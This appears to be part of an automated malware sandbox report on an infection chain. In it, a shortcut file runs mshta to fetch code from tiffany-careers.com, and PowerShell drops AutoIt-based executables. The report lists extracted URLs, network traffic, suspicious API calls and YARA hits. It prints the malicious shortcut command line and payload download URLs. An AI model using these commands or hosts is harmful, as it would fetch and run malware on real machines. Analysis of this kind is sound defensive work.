Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: svchost.exe, 00000004.00000002.2938459221.000001CA45800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1737447900.000001CA455FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CFEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/Marketing.pdf0
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4D25C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/PefjSkkhb.exep
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000014.00000000.1974013134.0000000000F79000.00000002.00000001.01000000.0000000E.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000018.00000002.2933759546.0000000000A89000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000005.00000002.1851770246.000001DB4CDC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45606000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45653000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1737447900.000001CA456B7000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000012.00000002.2020537958.000002DA8187D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000003.00000002.1966337969.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957090898.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5CE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2020537958.000002DA81904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2144003555.000002DA90077000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45672000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000004.00000003.1737447900.000001CA45606000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000012.00000002.2020537958.000002DA81655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000003.00000003.1947805084.000002B37DB43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000003.00000002.1965906319.000002B3059A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmp, R8CAg00Db8.lnkString found in binary or memory: https://tiffany-careers.com/ghep1
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/ghep1$global:?
Source: mshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1)
Source: mshta.exe, 00000003.00000002.1966627930.000002BB7FCBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1...
Source: mshta.exe, 00000003.00000002.1966706556.000002BB7FCDF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956325043.000002BB7FCDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1...t
Source: mshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep12C
Source: mshta.exe, 00000003.00000002.1966627930.000002BB7FCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep18
Source: mshta.exe, 00000003.00000002.1965775429.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1955152490.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948185973.000002B3055CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1=
Source: mshta.exe, 00000003.00000002.1966503123.000002B37DCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1B
Source: mshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1C
Source: forfiles.exe, 00000000.00000002.1706444973.0000019D3D5F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965120480.000002B37DBA3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966445570.000002B37DBA6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1C:
Source: mshta.exe, 00000003.00000003.1965266864.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966184314.000002B37DAF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1CC
Source: mshta.exe, 00000003.00000002.1966105858.000002B37DAD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1GI9
Source: mshta.exe, 00000003.00000002.1966009295.000002B37DA70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1H
Source: mshta.exe, 00000003.00000002.1965775429.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1955152490.000002B3055CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948185973.000002B3055CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1LMEMH
Source: mshta.exe, 00000003.00000003.1948749602.000002B37DB62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1NNC:
Source: forfiles.exe, 00000000.00000002.1706524188.0000019D3D7D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1ProgramW64
Source: forfiles.exe, 00000000.00000002.1706444973.0000019D3D5F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1S-
Source: mshta.exe, 00000003.00000003.1957829727.000002B303025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1https://tiffany-careers.com/ghep1
Source: mshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1u
Source: mshta.exe, 00000003.00000002.1966105858.000002B37DADE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghep1v
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000014.00000002.2939514467.0000000003FF7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00007FF79F900D24
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00007FF79F900D24
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F24830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,20_2_00F24830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A34830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,24_2_00A34830
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00007FF79F900A6C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8E7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,10_2_00007FF79F8E7E64
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F3D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,20_2_00F3D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A4D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,24_2_00A4D164

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 1260, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5D032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3305b38b-6
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5D032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_56be9eb4-b
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: This is a third-party compiled AutoIt script.10_2_00007FF79F8737B0
Source: PefjSkkhb.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe, 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ce5d5ba-1
Source: PefjSkkhb.exe, 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_437a729e-6
Source: PefjSkkhb.exe.5.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d31e1e75-b
Source: PefjSkkhb.exe.5.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_68f39bd4-c
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\PefjSkkhb.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows shortcut file (LNK) contains suspicious command line arguments
Source: R8CAg00Db8.lnkLNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/ghep1
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EC110: CreateFileW,DeviceIoControl,CloseHandle,10_2_00007FF79F8EC110
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,10_2_00007FF79F8DD2C4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8ED750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00007FF79F8ED750
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F15778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,20_2_00F15778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A25778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,24_2_00A25778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F90F63010_2_00007FF79F90F630
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F90206C10_2_00007FF79F90206C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F875F3C10_2_00007FF79F875F3C
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F89BEB410_2_00007FF79F89BEB4
